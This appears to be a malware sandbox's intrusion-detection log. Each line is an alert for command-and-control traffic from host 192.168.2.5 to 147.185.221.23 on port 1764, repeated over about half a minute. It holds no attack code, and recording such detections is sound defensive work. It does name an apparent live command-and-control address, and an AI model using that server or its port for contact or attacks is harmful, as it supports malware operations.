                      2024-10-13T19:12:09.041410+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:09.103592+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:09.243091+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:09.298114+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:09.649716+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:09.810227+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:10.036205+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:10.172361+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:10.247033+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:10.370431+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:10.511725+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:10.539006+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:10.677557+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:10.690879+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:10.805717+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:10.835119+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:10.941516+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:11.016661+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:11.064274+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:11.161218+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:11.201551+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:11.312756+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:11.317568+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:11.442153+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:11.450892+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:11.574635+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:11.587271+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:11.720818+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:11.747844+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:11.988065+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:12.137160+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:12.251002+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:12.281229+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:12.375056+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:12.399330+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:12.499961+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:12.532891+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:12.643206+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:12.679769+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:12.765617+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:12.798590+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:12.968776+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:12.974143+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:13.095426+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:13.120579+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:13.240100+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:13.290573+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:13.418353+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:13.464398+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:13.562549+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:13.583254+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:13.728205+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:13.742030+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:13.879802+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:13.886997+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:14.002233+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:14.017757+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:14.157330+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:14.167908+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:14.363773+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:14.527584+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:14.574078+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:14.708463+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:14.734315+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:14.912747+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:14.916697+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:15.118966+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:15.188522+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:15.389080+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:15.411312+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:15.548454+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:15.587779+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:15.730341+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:15.741610+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:15.953018+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:16.064764+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:16.248132+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:16.273825+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:17.012426+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:17.017309+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:17.369321+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:17.447217+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:17.658320+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:17.684649+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:17.975156+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:17.975399+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:18.365347+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:18.365361+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:18.587055+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:18.609956+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:18.817595+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:18.835712+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:19.574419+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:19.596150+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:19.873617+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:19.948926+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:20.084544+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:20.325538+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:20.351080+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:20.515764+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:20.526347+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:20.736662+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:20.745911+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:20.877835+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:20.886460+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:21.013792+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:21.081216+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:21.192567+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:21.308580+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:21.349009+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:21.431301+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:22.095058+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:22.115260+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:22.232557+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:22.430561+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:22.440941+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:22.658822+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:22.673457+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:22.781898+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:22.819264+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:23.004225+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:23.090074+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:23.244328+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:23.262297+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:23.412210+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:23.579801+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:23.595426+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:23.713797+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:23.760393+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:23.850608+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:23.921035+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:24.006148+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:24.161676+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:24.352233+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:24.574517+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:24.679730+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:24.733960+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:24.814751+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:24.857446+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:24.950074+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:24.997099+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:25.110595+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:25.124645+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:25.293763+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:25.293998+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:25.455667+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:25.466232+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:25.608734+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:25.678127+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:25.774868+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:25.826062+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:25.895480+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:25.974828+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:26.028030+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:26.147160+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:26.209852+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:26.287759+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:26.329015+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:26.407189+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:26.471123+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:26.544504+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:26.607806+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:26.921835+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:27.027606+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:27.103934+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:27.199954+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:27.247103+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:27.331825+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:27.378549+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:27.518166+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:27.539594+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:27.662638+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:27.678513+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:27.837997+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:27.853867+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:28.048964+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:28.094174+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:28.222540+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:28.256790+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:28.367789+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:28.391549+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:28.506135+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:28.549903+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:28.644140+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:28.687767+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:28.790721+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:28.840124+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:28.958698+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:28.971460+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:29.101521+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:29.123963+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:29.246305+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:30.008965+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:30.085857+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:30.150163+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:30.205383+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:30.297031+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:30.369218+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:30.517722+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:30.530430+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:30.648711+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:30.730093+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:30.829401+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:30.875292+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:30.960344+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:30.996382+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:31.079511+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:31.160652+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:31.229612+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:31.281282+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:31.348144+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:31.432884+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:31.473253+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:31.564526+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:31.600811+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:31.688421+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:31.720744+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:31.813899+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:31.887983+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:31.956024+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:32.041630+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:32.152429+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:32.198571+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:32.291137+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:32.330263+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:32.445535+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:32.490992+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:32.637656+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:32.638674+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:32.794370+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:32.974135+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:33.075007+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:33.095840+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:33.187899+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:33.209923+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:33.321634+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:33.333437+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:33.447112+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:33.458553+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:33.580065+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:33.599794+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:33.705830+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:33.735832+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:33.834460+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:33.847627+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:33.971928+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:33.997623+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:34.161227+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:34.178627+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:34.304281+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:34.319610+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:34.471841+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:34.474553+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:34.580343+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:34.587500+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:34.705441+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:34.708656+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:34.824783+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:34.828536+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:35.002318+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:35.002442+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:35.300151+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:35.300285+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:35.915475+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:35.921440+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:36.056195+020028528731Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:36.083186+020028528731Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
